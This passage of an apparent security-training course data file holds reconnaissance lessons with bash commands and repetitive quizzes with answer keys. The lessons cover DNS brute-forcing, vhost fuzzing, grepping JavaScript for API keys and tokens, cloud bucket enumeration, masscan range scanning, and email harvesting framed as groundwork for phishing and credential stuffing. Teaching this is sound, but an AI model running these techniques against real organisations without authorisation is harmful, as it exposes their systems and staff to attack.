IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-robots-sitemap","cat":"Reconnaissance","title":"robots.txt and Sitemap Analysis","diff":1,"xp":50,"intro":"Websites tell crawlers what to avoid \u2014 which tells you what to look at.","sections":[{"type":"text","content":"robots.txt lists directories the site doesn't want indexed. Sitemap.xml lists all pages. Both reveal structure and potentially sensitive paths."},{"type":"code","lang":"bash","content":"curl -s https://target.com/robots.txt\ncurl -s https://target.com/sitemap.xml\ncurl -s https://target.com/sitemap_index.xml\n# Common hidden paths:\n# /admin /backup /config /api /debug /test"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"robots.txt is primarily meant for...","opts":["Hackers","Search engine crawlers","Users","Admins"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-http-headers","cat":"Reconnaissance","title":"HTTP Response Header Analysis","diff":1,"xp":75,"intro":"Headers leak server software, frameworks, and security configurations.","sections":[{"type":"text","content":"Response headers reveal: Server (Apache/nginx version), X-Powered-By (PHP/ASP.NET), security headers present or missing (CSP, HSTS, X-Frame-Options). Missing security headers are findings."},{"type":"code","lang":"bash","content":"curl -I https://target.com\n# Key headers to check:\n# Server: Apache/2.4.41\n# X-Powered-By: PHP/7.4.3\n# Missing: Content-Security-Policy\n# Missing: Strict-Transport-Security\n# Missing: X-Frame-Options"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"X-Powered-By header reveals...","opts":["User info","Backend technology/framework","DNS config","SSL version"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-email-harvesting","cat":"Reconnaissance","title":"Email Address Harvesting","diff":1,"xp":75,"intro":"Collect email addresses for phishing campaigns and credential stuffing.","sections":[{"type":"text","content":"Email harvesting from search engines, social media, and company websites. The format (first.last vs flast) tells you how to guess other employees' addresses."},{"type":"code","lang":"bash","content":"theHarvester -d target.com -b google,bing,linkedin\nhunter.io -d target.com\n# Manual: site:target.com '@target.com'\n# Verify format: email-format.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Email format discovery helps because...","opts":["It reveals passwords","You can predict any employee's email address","It shows server IPs","It lists vulnerabilities"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-dns-brute","cat":"Reconnaissance","title":"DNS Subdomain Brute-Forcing","diff":2,"xp":150,"intro":"Discover subdomains not in public records by trying millions of names.","sections":[{"type":"text","content":"Active brute-forcing tries common subdomain names (dev, staging, api, admin) against the target's DNS. Combine with wordlists and permutation tools."},{"type":"code","lang":"bash","content":"gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\nffuf -u http://FUZZ.target.com -w subdomains.txt -mc 200\namass enum -brute -d target.com -w wordlist.txt\ndnsrecon -d target.com -D subdomains.txt -t brt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"DNS brute-forcing is considered...","opts":["Passive recon","Active recon (sends queries to target's DNS)","OSINT","Social engineering"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-virtual-host-enum","cat":"Reconnaissance","title":"Virtual Host Enumeration","diff":2,"xp":150,"intro":"Multiple websites on the same IP \u2014 discover them by fuzzing the Host header.","sections":[{"type":"text","content":"Web servers host multiple sites on one IP using virtual hosts. Fuzz the Host header to find hidden vhosts that aren't in DNS."},{"type":"code","lang":"bash","content":"ffuf -u http://10.10.10.5 -H 'Host: FUZZ.target.com' -w vhosts.txt -fs 0\ngobuster vhost -u http://10.10.10.5 -w wordlist.txt\ncurl -H 'Host: dev.target.com' http://10.10.10.5"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Virtual hosts are distinguished by...","opts":["IP address","The Host header in HTTP requests","Port number","Protocol"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-js-analysis","cat":"Reconnaissance","title":"JavaScript File Analysis for Secrets","diff":2,"xp":150,"intro":"Client-side JS files contain API endpoints, keys, and internal URLs.","sections":[{"type":"text","content":"Download all JS files and search for API keys, endpoints, comments with internal info, hardcoded credentials, and hidden functionality."},{"type":"code","lang":"bash","content":"# Find all JS files\ncurl -s https://target.com | grep -oP 'src=\"[^\"]+.js' | sort -u\n# Download and search\nfor url in $(cat js_urls.txt); do\n  curl -s $url | grep -oiE '(api_key|secret|password|token|auth|endpoint|internal)[\"=:][^s,;]+'\ndone\n# Or use LinkFinder\npython3 linkfinder.py -i https://target.com -o cli"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"JS analysis finds secrets because developers...","opts":["Encrypt everything","Often hardcode API keys and endpoints in client-side code","Use strong security","Never make mistakes"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-cloud-enum-advanced","cat":"Reconnaissance","title":"Multi-Cloud Enumeration","diff":3,"xp":200,"intro":"Systematically discover assets across AWS, Azure, and GCP simultaneously.","sections":[{"type":"text","content":"Enterprise targets use multiple clouds. Enumerate all three in parallel: S3 buckets, Azure blobs, GCP storage, cloud functions, API gateways, and exposed databases."},{"type":"code","lang":"bash","content":"# AWS\naws s3 ls s3://target-backup --no-sign-request\n# Azure\ncurl -s https://target.blob.core.windows.net/public?restype=container&comp=list\n# GCP\ncurl -s https://storage.googleapis.com/target-data/\n# Automated: cloud_enum\npython3 cloud_enum.py -k target -k targetcorp"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Multi-cloud enumeration is important because...","opts":["It's faster","Organizations often have forgotten assets across multiple providers","One cloud is enough","It tests backups"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-asn-mapping","cat":"Reconnaissance","title":"ASN and IP Range Mapping","diff":3,"xp":200,"intro":"Map all IP ranges owned by the target organization.","sections":[{"type":"text","content":"Organizations own ASNs (Autonomous System Numbers) that contain their IP ranges. Find the ASN, enumerate all prefixes, and scan the entire range."},{"type":"code","lang":"bash","content":"# Find ASN by organization name\ncurl -s https://api.bgpview.io/search?query_term=TargetCorp | jq '.data.asns'\n# List all prefixes for the ASN\ncurl -s https://api.bgpview.io/asn/AS12345/prefixes | jq '.data.ipv4_prefixes[].prefix'\nwhois -h whois.radb.net -- '-i origin AS12345'\n# Scan discovered ranges\nmasscan $(cat ranges.txt) -p80,443,22,445 --rate=1000"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"An ASN identifies...","opts":["A website","An organization's allocated IP address ranges","A DNS server","A firewall"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network 